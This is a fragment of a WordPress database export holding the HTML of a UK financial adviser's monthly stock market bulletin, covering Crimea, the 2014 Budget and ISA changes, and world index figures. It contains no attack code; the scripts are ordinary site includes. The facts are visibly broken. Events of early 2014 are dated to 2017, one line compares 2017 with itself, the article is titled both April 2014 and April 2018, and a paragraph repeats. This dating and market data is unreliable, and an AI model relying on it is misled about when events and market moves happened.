class=\"social-networks clearfix\">\n<ul class=\"social-networks clearfix\">\n 	<li class=\"twitter\">\n<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nTwitter\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n\n</div>\n<div id=\"text-23\" class=\"widget widget_text\">\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\" /></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>\n<p>&#13;\n		</div>\n</div>\n<p>&#13;\n		</div>\n<p>&#13;\n	</div>\n<p>&#13;\n				</p>\n<footer class=\"footer-area\">\n<div class=\"avada-row\"><p>&#13;\n			</p>\n<section class=\"columns columns-3\">\n<article class=\"col\">\n<div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">\n<p>Our Latest Posts</p>\n<ul>\n<li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>\n<p>&#13;\n					</p>\n<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>\n<p>&#13;\n					</p>\n<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>\n<p>&#13;\n					</p>\n<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>\n<p>&#13;\n				</ul>\n<div style=\"clear:both;\"/></div>\n</article>\n<article class=\"col\">\n<div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\">\n<p>Contact Info</p>\n<div class=\"contact-info-container\"><p>&#13;\n				</p>\n<p class=\"address\">Manchester &amp; London</p>\n<p>&#13;\n		&#13;\n				</p>\n<p class=\"phone\">Phone: </p>\n<p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				</p>\n<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>\n<p>&#13;\n		&#13;\n				&#13;\n				</div>\n<p>&#13;\n		</p>\n<div style=\"clear:both;\"/></div>\n</article>\n<article class=\"col\">\n<div style=\"clear:both;\"/></article>\n</section>\n</div>\n<p>				&#13;\n&#13;\n				</p>\n<article class=\"col last\"/></footer>\n</div>\n<p>&#13;\n	&#13;\n			</p>\n<footer id=\"footer\">\n<div class=\"avada-row\"/>&#13;\n	</footer>\n<p><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[ jQuery(window).load(function() { jQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\" , animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true}); }); ]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"}; /* ]]]]><![CDATA[> */\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\n/* <![CDATA[ */ var iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"}; /* ]]]]><![CDATA[> */\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\n/* <![CDATA[ */\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\n/* ]]]]><![CDATA[> */\n]]></script><script src=\"../wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\n<script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body></p>\n// ]]></script></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>','April 2018 Stock Market Bulletin','Read about','inherit','closed','closed','','47-autosave-v1','','','2017-09-21 17:31:46','2017-09-21 17:31:46','',47,'http://www.equalitywalk.org.uk/47-autosave-v1',0,'revision','',0),(322,1,'2017-09-21 17:32:08','2017-09-21 17:32:08','<div id=\"wrapper\">\r\n<div id=\"main\" class=\"clearfix \">\r\n<div class=\"avada-row\">\r\n<div id=\"content\" class=\"full-width\" style=\"width: 100%;\">\r\n<div id=\"post-8121\" class=\"post-8121 post type-post status-publish format-standard has-post-thumbnail hentry category-investments category-wealth-management post\">\r\n<div class=\"post-content\">\r\n<div class=\"wpb_row vc_row-fluid\">\r\n<div class=\"vc_span12 wpb_column column_container\">\r\n<div class=\"wpb_wrapper\">We started last month’s bulletin in the Crimea, with Russian troops in de facto control of the peninsula.\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n<div class=\"wpb_wrapper\">\r\n\r\n&nbsp;\r\n\r\nWell, the Crimea is now part of Russia again and the collected denunciations and threatened sanctions of William Hague, John Kerry and the European foreign ministers will do nothing to change that.\r\n\r\n&nbsp;\r\n\r\nThe question now is what happens in the Eastern Ukraine? The area has a clear majority of Russian speakers and supporters and is no doubt on Mr Putin’s shopping list. Cue more denunciations and threats of sanctions…\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nThe question now is what happens in the Eastern Ukraine? The area has a clear majority of Russian speakers and supporters and is no doubt on Mr Putin’s shopping list. Cue more denunciations and threats of sanctions…\r\n\r\n&nbsp;\r\n\r\nNot that the rest of the world was peaceful in March. North and South Korea once again exchanged fire, this time over a disputed sea boundary. The North has warned that it may carry out a ‘new kind’ of nuclear test and seems to be becoming increasingly unpredictable as Kim Jong-un tightens his grip on power.\r\n\r\n&nbsp;\r\n\r\nIn the UK the big event was George Osborne’s Budget speech on Wednesday March 19<sup>th</sup>.\r\n\r\n&nbsp;\r\n\r\nThe Chancellor confounded those who had been expecting a ‘steady as you go Budget’ with a series of far reaching reforms to pensions and savings. It was easy to see the Chancellor setting out not only the battle lines for next year’s General Election, but also his own leadership manifesto in the event of a defeat for David Cameron.\r\n\r\n&nbsp;\r\n\r\nWorld stock markets generally had a disappointing month in March, with none of the major markets showing significant gains. Among the emerging markets India and Brazil both made good progress, gaining 6% and 7% respectively.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n<div class=\"wpb_row vc_row-fluid\">\r\n\r\n&nbsp;\r\n<div class=\"vc_span12 wpb_column column_container\">\r\n\r\n&nbsp;\r\n<div class=\"wpb_wrapper\">\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n\r\n&nbsp;\r\n<div class=\"wpb_wrapper\">\r\n\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>United Kingdom</b></span></h1>\r\n&nbsp;\r\n\r\nAs noted above, the most important event in March was the Budget. The Chancellor declared that it would be a Budget for “makers, do-ers and savers” and proposed significant changes to the rules governing defined contribution pension schemes, allowing people much greater control over their own pensions and much more flexibility.\r\n\r\n&nbsp;\r\n\r\nThe Chancellor was, he said, “Prepared to trust the British people.”\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nThere were also major changes to the Individual Savings Account regime, with the annual limit raised to £15,000 and the limit on what can go into a cash ISA removed. They’ll now be called New ISAs, or NISAs. Cue several limp headlines in the papers…\r\n\r\n&nbsp;\r\n\r\nThis monthly bulletin isn’t really the place to go into all the implications of the Budget, but it <i>will</i> impact significantly on the financial planning of many of our clients. If you have any questions at all on what the Budget might mean for you, please don’t hesitate to contact us.\r\n\r\n&nbsp;\r\n\r\nMeanwhile, the debate on Scottish devolution rumbled on. The opinion polls currently have the ‘No’ vote on 52% compared to ‘Yes’ at 37%. For those who prefer a more reliable guide the bookmakers are convinced that independence won’t happen, and are betting accordingly.\r\n\r\n&nbsp;\r\n\r\nBad news for the ‘yes’ campaign came when 1 in 3 firms polled confirmed that they would consider re-locating head offices in the event of independence, and the Westminster government continues to rule out any prospect of a currency union with an independent Scotland. The poll is still 5½ months away, on September 18<sup>th</sup>\r\n\r\n&nbsp;\r\n\r\nTwo pieces of contrasting news in March illustrated the way the UK economy may be moving, both short and long-term. Supermarket group Morrison’s issued its second profits warning as it struggled to maintain market share, squeezed by Aldi and Lidl on one side and Tesco and Sainsbury’s on the other.\r\n\r\n&nbsp;\r\n\r\nMeanwhile King Digital (a company that very few readers of this bulletin will have heard of) became Britain’s most valuable publicly listed internet company when it floated on the New York stock exchange with a valuation of $7.6bn.\r\n\r\n&nbsp;\r\n\r\nWhat does King Digital do? It makes <i>Candy Crush</i> a game which 144m people play on their mobiles every day. That’s right, a hundred and forty-four million.\r\n\r\n&nbsp;\r\n\r\nThe FTSE-100 index had a disappointing month, falling by 3% to finish March at 6,598. At the end of the first quarter of 2017 it is down 2% on a year to date basis.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"clearboth\"></div>\r\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>Europe </b></span></h1>\r\n&nbsp;\r\n\r\nMarch saw contrasting fortunes for France and Italy, the second and third biggest Eurozone economies. In France the central bank predicted growth of just 0.2% for the first quarter – unchanged from an earlier estimate and down on the 0.3% growth in the final quarter of 2017.\r\n\r\n&nbsp;\r\n\r\nFrench industrial production also fell by 0.2% against expectations of 0.2% growth.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nMeanwhile Italy posted its biggest rise in industrial production for two years, up 1% in January and comfortably ahead of all the forecasts. This confirmed a slow but gradual recovery in the country, which finally came out of its longest post-war recession in the final quarter of 2017.\r\n\r\n&nbsp;\r\n\r\nThat said, industrial production remains 24% lower than in 2008, so there is still some way to go…\r\n\r\n&nbsp;\r\n\r\nFigures released for January showed that Germany had a €15bn trade surplus in January (up from a revised figure of €13.9bn for the previous month – and as a comparison the UK had a trade deficit of £22bn in the three months to December 2017).\r\n\r\n&nbsp;\r\n\r\nThe German inflation rate fell to 1% in March, a 3½ year low and down from 1.2% in February. There was also good news on unemployment which fell more than expected in March, as the German economy was boosted by relatively mild winter weather. The number unemployed fell by 12,000 – against analysts’ predictions of 7,500.\r\n\r\n&nbsp;\r\n\r\nOn the stock markets the German DAX index ended March 1% down at 9,556, while the French CAC-40 index was virtually unchanged at 4,391.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"clearboth\"></div>\r\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>USA</b></span></h1>\r\n&nbsp;\r\n\r\nIn the US the news was less good – the University of Michigan’s index of consumer sentiment fell, even though personal spending rose in February. It seems that Americans are spending now as they feel less confident about having the money to spend in the future.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nGDP growth was revised up to 2.6% for the final quarter of 2017 and jobless claims were down to a 4 month low. But manufacturing slowed in March and figures for February confirmed another near $40bn trade deficit – a figure the US Government seems powerless to do anything about.\r\n\r\n&nbsp;\r\n\r\nFor now President Obama appears to have won his battle with Congress, but the race to succeed him is gradually cranking up (with Hilary Clinton still the favourite). Expect to hear the words ‘lame’ and ‘duck’ around this time next year.\r\n\r\n&nbsp;\r\n\r\nNo lame ducks in the Zuckerberg household where Mark (not yet 30) has seen his fortune rise by $15bn over the past two years due to the strong performance of Facebook shares. I believe I was sceptical at the time of the flotation. So that would be a large slice of humble pie…\r\n\r\n&nbsp;\r\n\r\nThe Dow Jones index managed to stagger up by 1% in March, with the index closing at 16,458 – fractionally down on a year-to-date basis.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"clearboth\"></div>\r\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>Far East </b></span></h1>\r\n&nbsp;\r\n\r\nDespite the Chinese Government announcing a target of 7.5% growth for the next 12 months, several indicators released in March suggested that the Chinese economy is slowing down.\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"></p>\r\nIndustrial production for the first two months of 2017 was 8.6% up on the same period in 2017, but the expectation had been for 9.5% growth. This was the worst performance since 2009 and was partly due to strikes and industrial unrest in factories across China.\r\n\r\n&nbsp;\r\n\r\nConsumer spending also appears to be running out of steam, with the growth in retail sales in January and February the slowest for three years. That said it was up by 11.8% (a figure the West can’t even dream about) but expectations had been for 13.5%.\r\n\r\n&nbsp;\r\n\r\nWith investment in fixed assets by business also down, these are worrying signs for the Chinese economy, which will have a “drag” effect on the rest of region.\r\n\r\n&nbsp;\r\n\r\nPresident Li Keqiang spoke of “severe challenges” and there were suggestions that the Central Bank could announce a series of measures to inject some impetus into the economy.\r\n\r\n&nbsp;\r\n\r\nJapan’s economy also grew more slowly than expected in the fourth quarter of 2017, and again, both business investment and consumer spending fell below expectations.\r\n\r\n&nbsp;\r\n\r\nNo such worries in South Korea where the trade surplus for March improved to $4.19bn, up from $933m the previous month. Exports jumped to the second-highest figure on record due to higher demand from the USA and Europe.\r\n\r\n&nbsp;\r\n\r\nThe South Korean and Japanese stock markets were virtually unchanged at the end of March, whilst China fell by just 1% to 2,033. The Hong Kong market declined by 3% to 22,151 and is now down by 5% for the year as a whole.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"clearboth\"></div>\r\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>Emerging Markets </b></span></h1>\r\n&nbsp;\r\n\r\nIt’s hardly surprising that the Russian market fell significantly in March, given the threat of economic sanctions. The main index ended the month down 5% at 1,369 – down 9% on a year-to-date basis.\r\n\r\n&nbsp;\r\n\r\nHowever, figures for the last quarter of 2017 confirmed that the Russian economy was doing better than expected: it grew by 2% for the final three months of last year, against expectations of 1.3%.\r\n\r\n&nbsp;\r\n\r\nAs indicated above, there were much better returns from the other major emerging markets, with the Indian index up 6% in the month at 22,386 and the Brazilian index up 7% to 50,415 (although it is still down overall in 2017).\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2><span style=\"color: #0000ff;\"><b>And finally…</b></span></h2>\r\n&nbsp;\r\n\r\nMany London estate agents had to be rushed to hospital with acute excitement (or greed) in March, when a study was published suggesting that the average central London flat will cost £36m by the year 2050.\r\n\r\n&nbsp;\r\n\r\nLondon Central Portfolio launched a £100m fund to buy flats in ‘prime’ areas of London (that is, the area surrounding Hyde Park, from Notting Hill to Pimlico) confident that its prediction of 9% a year annual growth would become a reality, with or without the help of Russian oligarchs.\r\n\r\n&nbsp;\r\n\r\nSadly none of us in the office own a flat in Notting Hill or moonlights as an oligarch, so we’ll back at the beginning of May with the next monthly bulletin.\r\n\r\n&nbsp;\r\n\r\nIn the meantime we’ll be happy to answer your questions on the Budget or any other aspect of financial planning.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"meta-info\">\r\n\r\n&nbsp;\r\n<div class=\"vcard\">\r\nBy <span class=\"sep\">|</span>Categories: <a title=\"View all posts in Investments\" href=\"../category\" rel=\"category tag\">Investments</a>, <a title=\"View all posts in Wealth Management\" href=\"../category/wealth-management/\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a title=\"Comment on April 2014 Stock Market Bulletin\" href=\"../april-2014-stock-market-bulletin/\">0 Comments</a></div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"share-box\">\r\n\r\n&nbsp;\r\n<h4></h4>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"facebook\">\r\n<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;p[title]=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">\r\nFacebook\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nFacebook\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"twitter\">\r\n<a href=\"http://twitter.com/home?status=April+2014+Stock+Market+Bulletin%20http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\" target=\"_blank\" rel=\"nofollow\">\r\nTwitter\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTwitter\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"linkedin\">\r\n<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;title=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">\r\nLinkedIn\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nLinkedIn\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"reddit\">\r\n<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;title=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">\r\nReddit\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nReddit\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tumblr\">\r\n<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fapril-2014-stock-market-bulletin%2F&amp;name=April+2014+Stock+Market+Bulletin&amp;description=We+started+last+month%E2%80%99s+bulletin+in+the+Crimea%2C+with+Russian+troops+in+de+facto+control+of+the+peninsula.+Well%2C+the+Crimea+is+now+part+of+Russia+again+and+the+collected+denunciations+and+threatened+sanctions+....\" target=\"_blank\" rel=\"nofollow\">\r\nTumblr\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTumblr\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"google\">\r\n<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\" target=\"_blank\" rel=\"nofollow\">\r\nGoogle +1\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nGoogle +1\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tf-pinterest\">\r\n<a href=\"#\">\r\nPinterest\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nPinterest\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"email\">\r\n<a href=\"mailto:?subject=April 2014 Stock Market Bulletin&amp;body=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\">\r\nEmail\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nEmail\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author\">\r\n\r\n&nbsp;\r\n<div class=\"title\">\r\n<h2>About the Author:</h2>\r\n<div class=\"title-sep-container\"></div>\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author-container\"></div>\r\n&nbsp;\r\n\r\n</div>\r\n<!-- You can start editing here. -->\r\n\r\n\r\n<!-- If comments are open, but there are no comments. -->\r\n<div id=\"respond\" class=\"comment-respond\">\r\n\r\n&nbsp;\r\n<div class=\"title\">\r\n<h2></h2>\r\n<div class=\"title-sep-container\"></div>\r\n</div>\r\n<small><a id=\"cancel-comment-reply-link\" style=\"display: none;\" href=\"../april-2014-stock-market-bulletin/\" rel=\"nofollow\">Cancel reply</a></small>\r\n\r\n<form id=\"commentform\" class=\"comment-form\" action=\"/\" method=\"post\">&nbsp;\r\n<div id=\"comment-input\"><input id=\"author\" class=\"input-name\" tabindex=\"1\" name=\"author\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Name (required)\" /><input id=\"email\" class=\"input-email\" tabindex=\"2\" name=\"email\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Email (required)\" /></div>\r\n&nbsp;\r\n<div id=\"comment-textarea\"></div>\r\n<p class=\"form-submit\">\r\n<input id=\"comment-submit\" name=\"submit\" type=\"submit\" value=\"Post Comment\" /><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"8121\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" type=\"hidden\" value=\"ed534b789c\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"ak_js\" name=\"ak_js\" type=\"hidden\" value=\"25\" /></p>\r\n&nbsp;\r\n\r\n</form></div>\r\n<!-- #respond -->\r\n<script type=\"text/javascript\"><![CDATA[ jQuery(document).ready(function () { jQuery(\'#commentform\').submit(function () { _gaq.push( [\'_setAccount\', \'UA-10958181-3\'], [\'_trackEvent\', \'comment\', \'submit\'] ); }); }); ]]></script>\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div id=\"sidebar\" style=\"display: none;\">\r\n\r\n&nbsp;\r\n<div id=\"text-24\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big>\r\n\r\npeople who get our best financial wisdom on a weekly basis.</center>\r\n<a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" target=\"_blank\"><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>\r\n<p>&#13;\r\n		</div>\r\n<div id=\"recent_works-widget-2\" class=\"widget recent_works\">\r\n<div class=\"heading\">\r\n<p>New Guides</p>\r\n</div>\r\n<div class=\"recent-works-items clearfix\">&#13;\r\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\r\n					</a>&#13;\r\n				</div>\r\n<p>&#13;\r\n&#13;\r\n		</div>\r\n<div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">\r\n<div class=\"tab-holder\"><p>&#13;\r\n			</p>\r\n<div class=\"tab-hold tabs-wrapper\"><p>&#13;\r\n				</p>\r\n<ul id=\"tabs\" class=\"tabset tabs\">\r\n<li><a href=\"#tab-popular\">Popular</a></li>\r\n<p>&#13;\r\n															</p>\r\n<li><a href=\"#tab-recent\">Recent</a></li>\r\n<p>&#13;\r\n														</ul>\r\n<div class=\"tab-box tabs-container\"><p>&#13;\r\n										</p>\r\n<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\"><p>&#13;\r\n												</p>\r\n<ul class=\"news-list\">\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										October 12th, 2017									